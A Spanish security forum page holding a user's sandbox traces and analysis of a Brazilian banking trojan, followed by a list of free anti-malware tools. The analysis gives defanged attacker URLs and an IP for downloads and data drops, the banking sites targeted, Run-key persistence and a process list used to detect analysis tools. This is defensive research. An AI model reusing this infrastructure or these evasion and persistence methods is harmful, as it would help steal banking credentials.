LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,92) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(security.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(9078c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(607a0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(6079c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c07e4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(fwpuclnt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetForegroundWindow() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c076e) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(MSCTF.Shared.MUTEX.IKG) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPPROCESS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
QuerySystemInformation() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(System,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(smss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(csrss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(winlogon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(services.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(lsass.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxService.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(svchost.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieSvc.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(explorer.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxTray.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(ctfmon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(alg.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(idag.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(PE Explorer (portable).exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(notepad.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(EvO_DBG.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Comprovante.pdf2.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(sniff_hit.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsob.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(procexp.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Projeto.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsobs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(u1210.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(BSA.EXE,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieCtrl.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(wireshark.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(dumpcap.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieRpcSs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieDcomLaunch.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateFile(c:\wina\s33ass.txt) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]

Código:
 Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "jsob.exe=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RUN
                 binary data=C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "MSCTF.Shared.MUTEX.IKG".
   * Enumerates running processes.
   * Contains string Traces of AutoStart registry key ("Software\Microsoft\Windows\CurrentVersion\Run")
   * Contains string Checks for Chrome browser software presence ("CHROME.EXE")
   * Contains string Anti-Malware Analyzer routine: Norman Sandbox detection ("CurrentUser")
   * Contains string Checks for FireFox browser software presence ("FIREFOX.EXE")

Código:
Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

Detailed report of suspicious malware actions:

Anti-Malware Analyzer routine: Norman Sandbox detection
Checked for debuggers
Checks for Chrome browser software presence
Checks for FireFox browser software presence
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: MSCTF.Shared.MUTEX.IKG
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RUN\jsob.exe = 43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000
Enumerated running processes
Traces of AutoStart registry key

Sigue...
368  Seguridad Informática / Análisis y Diseño de Malware / Troyano bancario en: 2 Febrero 2013, 11:29 am
Este archivo me llegó a través del msn, de un "chica brasileña" que bien está infectada o intenta infectar. Nunca he hablado con ella pero me llega cada cierto tiempo.

URL de descarga: Pedir al moderador del foro o a mi.

Análisis online:

Anubis: http://anubis.iseclab.org/?action=result&task_id=13ce18b22910d4e84fd6779888568e7e9

VirusTotal: https://www.virustotal.com/file/82d34b76ed08587d62e78088f03e60ae5b868389f0d164c86a25b6fd23b8402a/analysis/1359671924/ (9/46)

Comprimido con UPX:





Peso comprimido: 118 KB
Peso descomprimido: 314 KB

Se inyecta en el proceso i.explore.exe y crea el proceso svchost.exe con la cuenta de admnistrador:



Desde el mismo servidor con otra cuenta de usuario descarga los siguientes archivos:



hxxps://s3-sa-east-1.amazonaws.com/manolomaias/jana.swf
hxxps://s3-sa-east-1.amazonaws.com/manolomaias/carla.swf
hxxps://s3-sa-east-1.amazonaws.com/manolomaias/mara.swf
hxxps://s3-sa-east-1.amazonaws.com/manolomaias/adriana.swf

Crea las carpetas Windows\Drivers en la ruta: C:\Documents and Settings\usuario\Datos de programa\Microsoft\

  Created   0   C:\DOCUME~1\usuario\DATOSD~1\Microsoft\Windows   
  Modifed   0   C:\DOCUME~1\usuario\DATOSD~1\Microsoft   
  Created   0   C:\DOCUME~1\usuario\DATOSD~1\drivers

Crea los siguientes drivers:

  Created   0   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl8194.vxd   
  Modifed   0   C:\Documents and Settings\usuario\Datos de programa\drivers   
  Modifed   F1800   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl8194.vxd   
  Created   0   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl745G.vxd   
  Modifed   0   C:\DOCUME~1\usuario\DATOSD~1\drivers   
  Modifed   99E00   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl745G.vxd   
  Created   0   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl2108.rtl   
  Modifed   12F000   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl2108.rtl   
  Created   7C00   C:\DOCUME~1\usuario\DATOSD~1\drivers\rtl3264.vxd

Crea el siguiente archivo:

  Created   0   C:\Documents and Settings\usuario\Datos de programa\Microsoft\netA8335EC6security.cpl (100 MB)







Crea de nuevo otro driver:

  Created   0   C:\Documents and Settings\usuario\Datos de programa\drivers\1ctrl2580.vxd   
  Modifed   1F   C:\Documents and Settings\usuario\Datos de programa\drivers\1ctrl2580.vxd   

Capturas de Process Monitor (lectura y creación de archivos/drivers):













Los archivos descargados inicialmente, aparentemente .swf simplemente son renombrados (los hash de archivo son idénticos):





Verifica cada poco tiempo la conexión a Internet desde Goolgle Brasil:



URL´s del proceso dumpeado "svchost":

hxxps://www2.bancobrasil.com.br/aapf/login.jsp?aapf.IDH=
hxxps://www2.bancobrasil.com.br/aapf/relacionamento/mcib.jsp
hxxps://internetbanking.caixa.gov.br/SIIBC/altera_endereco.processa
hxxps://internetbanking.caixa.gov.br/SIIBC/tipo_doc.processa
hxxps://internetbanking.caixa.gov.br/SIIBC/saldo.processa
hxxps://internetbanking.caixa.gov.br/SIIBC/tipo_doc.processa
hxxps://internetbanking.caixa.gov.br/SIIBC/index.processa
hxxps://www.citibank.com.br/BRGCB/JSO/signon/uname/HomePage.do
hxxps://www2.bancobrasil.com.br/aapf/includesSRP/processaVersionamentoAAPF.jsp?continuarVersaoAtual=sim
hxxp://www.it-eksperten.no/components/com_joomlawatch/log/error.php
hxxp://www.blackgreenfoods.com/plugins/system/error.php
hxxp://www.bb.com.br
hxxp://www.bb.com.br.pf/
hxxps://aapj.bb.com.br/aapj/login.br/SIIBC/index.pr
hxxps://aapj.bb.com.br/aapj/loginpfe.bb
hxxps://aapj.bb.com.br/aapj/loginmpe.bb
hxxps://aapj.bb.com.br/aapj/logingov.bb
hxxps://aapj.bb.com.br/aapj/loginpfe.bb
hxxp://www.santander.com.br
hxxp://www.bb.com.br.com.br
hxxp://www.bradesco.com.br
hxxp://64.120.134.60/1.php

hxxp://liviaeletro2012.com.br/animacao.gif
hxxp://www.liviaeletro2012.com.br/kid/1.php
hxxp://bacana2012.mail.ht/Kid2012/acesso.php./error

No he conseguido entrar al servidor ftp:
xftp://bacana2012.mail.ht/

Capturas de Wireshark:






Los procesos creados pueden ser eliminados sin problemas y no se vuelven a crear.

Aquí una de las web´s del log de Wireshark, donde quedan registrados y publicados todos los datos de los pc´s:

No he subido la imagen por contener datos privados que no creo sea conveniente publicar...
 
Mis datos de entrada publicados en la web:

# Windows XP # 8.0.6001.18702 # USUARIO # A8335EC6 #  # IP # 2976 # 2013-02-01  #  04:23:39 #  #  # Brazil<br />
13 #
# Windows XP # 8.0.6001.18702 # USUARIO # A8335EC6 #  # IP # 3884 # 2013-02-01  #  10:33:43 #  #  # Brazil<br />
1 #

La conclusión que he sacado es que se inyecta en el proceso i.explore.exe ayudado por el svchost.exe falso que contiene las url. Al cargar los drivers, se asegura que cada vez que obtenga datos del usuario relacionados con datos bancarios serán enviados a algun servidor.

Un saludo.
369  Seguridad Informática / Seguridad / Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección. en: 31 Enero 2013, 09:56 am
Guía rápida para la descarga de herramientas gratuitas para la seguridad y desinfección de malware.
Clasificada por categorías con descarga directa de los programas.

Herramientas que generan log de reporte para subir al foro:

Hijackthis:
- D.Directa: https://dragokas.com/tools/HiJackThis.zip
-Tutorial: http://dragokas.com/tools/help/hjt_tutorial.html

OTL:
- Web: http://www.geekstogo.com/forum/topic/277391-otl-tutorial-how-to-use-oldtimer-listit/
- D.Directa: http://oldtimer.geekstogo.com/OTL.exe | http://oldtimer.geekstogo.com/OTL.com | http://oldtimer.geekstogo.com/OTL.scr
- Tutorial: http://foro.elhacker.net/seguridad/tutorial_de_analisis_del_pc_con_otl_de_oldtimer-t368848.0.html;msg1773490#msg1773490

SysInspector:
- Web: http://eset.es/soporte/sysinspector/
- D.Directa (32 bits): http://download.eset.com/download/sysinspector/32/ESN/SysInspector.exe
- D.Directa (64 bits): http://download.eset.com/download/sysinspector/64/ESN/SysInspector.exe
- Tutorial: http://foro.elhacker.net/seguridad/tutorial_de_analisis_del_pc_con_sysinspector_de_eset-t367238.0.html;msg1767090#msg1767090

AVZ (Kaspersky):
- Web: https://support.kaspersky.com/14612
- Descarga: https://media.kaspersky.com/utilities/ConsumerUtilities/avz5.zip?_ga=2.131545295.1596873192.1608561045-35682109.1603800607
- Tutorial: https://foro.elhacker.net/seguridad/tutorial_de_analisis_de_sistemas_con_avz_antiviral_toolkit_de_kaspersky-t367418.0.html

Optimización y limpieza:

CCleaner:
- Web: https://www.ccleaner.com/es-es#
- D.Directa: https://www.ccleaner.com/es-es/ccleaner/download/standard

Glary Utilities:
- Web: https://www.glarysoft.com/
- D.Directa: https://download.glarysoft.com/gu5setup.exe
- Faq: https://www.glarysoft.com/support/

Windows Repair (All in One):
- Web: https://www.tweaking.com/content/page/windows_repair_all_in_one.html
- D.Directa: https://www.tweaking.com/files/setups/tweaking.com_windows_repair_aio_setup.exe
- Portable: http://www.majorgeeks.com/Tweaking.com_-_Windows_Repair_Portable_d7222.html


Procesos (Administrador de tareas):

Process Explorer:
- Web: https://docs.microsoft.com/es-es/sysinternals/downloads/process-explorer?redirectedfrom=MSDN
- D.Directa: https://download.sysinternals.com/files/ProcessExplorer.zip

Process Hacker:
- Web: https://processhacker.sourceforge.io/
- D.Directa: https://github.com/processhacker/processhacker/releases/download/v2.39/processhacker-2.39-setup.exe
- Portable: https://github.com/processhacker/processhacker/releases/download/v2.39/processhacker-2.39-bin.zip

Procesos varios:

Autoruns: (Visualiza y desactiva programas que inician con Windows)
- Web: https://docs.microsoft.com/es-es/sysinternals/downloads/autoruns?redirectedfrom=MSDN
- D.Directa: https://download.sysinternals.com/files/Autoruns.zip

WhatsInStartup: (Visualiza y desactiva programas que inician con Windows)
- Web: https://www.nirsoft.net/utils/what_run_in_startup.html
- D.Directa (32 bits): https://www.nirsoft.net/utils/whatinstartup.zip
- D.Directa (64 bits): https://www.nirsoft.net/utils/whatinstartup-x64.zip

Unlocker: Desbloquea/elimina procesos en uso (destildar la instalación de la "toolbar") La descarga  de la versión portable se realizará desde los servidores de BrotherSoft.
- Web: http://www.emptyloop.com/unlocker/
- D.Directa (32 y 64 bits): https://www.filehorse.com/es/descargar-unlocker/descargar/

Antivirus gratuitos:

AVG:
- Web: https://www.avg.com/es-es/free-antivirus-download
- D.Directa: https://www.avg.com/es-es/download-thank-you.php?product=freegsr&variant=698

Avira Antivir:
- Web: https://www.avira.com/es/downloads
- D.Directa: https://www.avira.com/es/start-download/product/2262/-I12e2mvtstLKUkGnG-U3eKJ0v4AM94lDY1P

Panda:
- Web: https://www.pandasecurity.com/es/homeusers/free-antivirus/
- D.Directa: https://download.cnet.com/Panda-Free-Antivirus/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=es

Kaspersky Security cloud:
- Web: https://www.kaspersky.es/free-cloud-antivirus
- D.Directa: https://www.kaspersky.es/downloads/thank-you/free-antivirus-download

360 Total Security:
- Web: https://www.360totalsecurity.com/es/download-free-antivirus/
- D.Directa: https://www.360totalsecurity.com/es/download-free-antivirus/360-total-security/

Antivirus de pago:

AVG Internet Security:
- Web: https://www.avg.com/es-es/internet-security
- D.Directa: https://www.avg.com/es-es/download-thank-you.php?product=gsr&variant=755

Panda Dome:
- Web: https://www.pandasecurity.com/es/homeusers/#

Eset antivirus:
- Web: https://demos.eset.es/

Kaspersky antivirus:
- Web: https://www.kaspersky.es/downloads/thank-you/antivirus-free-trial

Antivirus portables:

Immunet Protect:
- Web: https://www.immunet.com/index
- D.Directa: https://download.immunet.com/binaries/immunet/bin/ImmunetSetup.exe

Comodo Cloud Scanner:
- Web: https://www.comodo.com/home/download/download.php?prod=cloud-scanner

McAfee Stinger:
- Web: https://www.mcafee.com/enterprise/es-es/downloads/free-tools/stinger.html
- D.Directa: https://downloadcenter.mcafee.com/products/mcafee-avert/Stinger/stinger32.exe

Clamwin:
- Web: http://es.clamwin.com/content/view/18/46/
- D.Directa: http://downloads.sourceforge.net/clamwin/clamwin-0.99.4-setup.exe

Firewall:

Zone Alarm:
- Web: https://www.zonealarm.com/es/software/free-firewall
- D.Directa: https://www.zonealarm.com/es/software/free-firewall/download

Suites completas (integran antivirus + cortafuegos):

Comodo:
- Web: https://www.comodo.com/home/internet-security/firewall.php
- D.Directa: https://antivirus.comodo.com/download/thank-you.php?prod=cloud-antivirus&from=cav_installer&af=7639#_ga=2.116353542.1464943389.1607589331-1017039581.1605498352

Avira:
- Web: https://www.avira.com/es/free-security
- D.Directa: https://www.avira.com/es/start-download/product/2262/-I12e2mvtstLKUkGnG-U3eKJ0uoRLs0hU9xCRx-aYuBBOiLOFMgKktbw-PU

Antispyware:

Malwarebytes antimalware:
- Web: https://es.malwarebytes.com/
- D.Directa: https://es.malwarebytes.com/mwb-download/thankyou/

Hitman Pro:
- Web: https://www.hitmanpro.com/en-us/downloads.aspx
- D.Directa (rellenar formulario): https://secure2.sophos.com/en-us/products/free-tools/hitmanpro.aspx

Superantispyware:
- Web: https://www.superantispyware.com/
- D.Directa: https://www.superantispyware.com/downloadfile.html?productid=SUPERANTISPYWAREFREE

AdwCleaner:
- Web: https://toolslib.net/downloads/viewdownload/1-adwcleaner/

Spybot Search & Destroy:
- Web: https://www.safer-networking.org/download/

Microsoft Safety Scanner:
Web: https://docs.microsoft.com/ca-es/windows/security/threat-protection/intelligence/safety-scanner-download
D.Directa (x32): https://go.microsoft.com/fwlink/?LinkId=212733
D.Directa (x64): https://go.microsoft.com/fwlink/?LinkId=212732

Removal tool (elimina malware genérico):

Kaspersky Virus Removal Tool:
- Web: https://www.kaspersky.com/downloads/thank-you/free-virus-removal-tool
- D.Directa: https://devbuilds.s.kaspersky-labs.com/devbuilds/KVRT/latest/full/KVRT.exe

Avira Antivir Removal Tool:
- Web: https://www.majorgeeks.com/files/details/avira_removal_tool_for_windows.html

Emsisoft Emergency Kit:
-Web: https://www.emsisoft.com/en/home/emergencykit/
-D.Directa: https://www.emsisoft.com/en/home/emergencykit/download/

Antirootkit:

PCHunter:
Web: http://www.xuetr.com/download/
Descarga directa: http://www.xuetr.com/download/PCHunter_free.zip
Peso: 7,1 MB (incluye la versión de 32 y 64 bits)

Gmer:
- Web: http://www.gmer.net/
- D.Directa: http://www2.gmer.net/gmer.zip

TDSSKiller:
- Web: https://support.kaspersky.com/5350
- D.Directa: https://media.kaspersky.com/utilities/VirusUtilities/EN/tdsskiller.exe?_ga=2.94387036.1596873192.1608561045-35682109.1603800607

Malwarebytes Anti-Rootkit:
Web: https://es.malwarebytes.com/antirootkit/
D.Directa: https://downloads.malwarebytes.com/file/mbar/

Rootkit Revealer:
- Web: https://docs.microsoft.com/en-us/sysinternals/downloads/rootkit-revealer
- D.Directa: https://download.sysinternals.com/files/RootkitRevealer.zip

SpyDLLRemover:
- Web: https://securityxploded.com/spydllremover.php
- D.Directa: http://securityxploded.com/download-software.php?id=3351

Mcafee-avert:
- Web: https://www.mcafee.com/enterprise/es-es/downloads/free-tools/rootkitremover.html
- D.Directa: https://downloadcenter.mcafee.com/products/mcafee-avert/rr/rootkitremover.exe

Dr.Web:
Web: https://free.drweb-av.es/download+cureit+free/?lng=es

Rogue: Elimina falsas soluciones de protección instaladas en tu equipo.

ERA Remover:
- Web: http://www.virusradar.com/en/tools/cleaners
- D.Directa (32 bits): http://download.eset.com/special/ERARemover_x86.exe
- D.Directa (64 bits): http://download.eset.com/special/ERARemover_x64.exe

Norton Power Eraser:
- Web: https://support.norton.com/sp/static/external/tools/npe.html
- D.Directa: https://buy-download.norton.com/downloads/premium_services/NPE/5.3/es/NPE.exe

Ransomware: Desbloquea las modificaciones en sistema y archivos.

RannohDecryptor:
- Web: https://support.kaspersky.com/8547
- D.Directa: https://media.kaspersky.com/utilities/VirusUtilities/RU/rannohdecryptor.zip?_ga=2.60192621.1596873192.1608561045-35682109.1603800607

XoristDecryptor:
- Web: https://support.kaspersky.com/2911
- D.Directa: https://media.kaspersky.com/utilities/VirusUtilities/RU/xoristdecryptor.exe?_ga=2.161814524.1596873192.1608561045-35682109.1603800607

CryptoPrevent (Beta):
Web: https://www.d7xtech.com/cryptoprevent-anti-malware/

MBR: Analizan y eliminan infecciones en el sector de arranque del disco.

MBR rootkit detector:
- Web: http://www.gmer.net/
- D.Directa: http://www2.gmer.net/mbr/mbr.exe

Avast aswMBR:
- Web: https://www.avast.com/c-rootkit-scanner-tool
- D.Directa: http://public.avast.com/~gmerek/aswMBR.exe

LiveCD: Disco de rescate para iniciar antes del inicio del sistema operativo.

Kaspersky Rescue Disc:
- Web: https://www.kaspersky.es/downloads/thank-you/free-rescue-disk
- D.Directa: https://rescuedisk.s.kaspersky-labs.com/latest/krd.iso

F-Secure Rescue CD:
- Web: https://www.majorgeeks.com/files/details/f_secure_rescue_cd.html

Máquinas virtuales:

Virtualización completa de sistema:

VirtualBox:
Web: https://www.virtualbox.org/wiki/Downloads

VMware Player:
- Web: https://www.vmware.com/es/products/workstation-player.html
- Descarga: https://www.vmware.com/go/downloadworkstationplayer

Bochs:
- Web: http://bochs.sourceforge.net

Virtualización de procesos: Virtualiza la ejecución de archivos y documentos en entorno seguro.

Sandboxie:
- Web: https://github.com/sandboxie-plus/Sandboxie/releases
- D.Directa: https://github.com/sandboxie-plus/Sandboxie/releases/tag/v0.5.0
 
Conexiones y redes:
Conexiones:

TCPView:
- Web: https://docs.microsoft.com/es-es/sysinternals/downloads/tcpview
- D.Directa: https://download.sysinternals.com/files/TCPView.zip

CurrentPorts:
- Web: https://www.nirsoft.net/utils/cports.html
- D.Directa (x32): https://www.nirsoft.net/utils/cports.zip
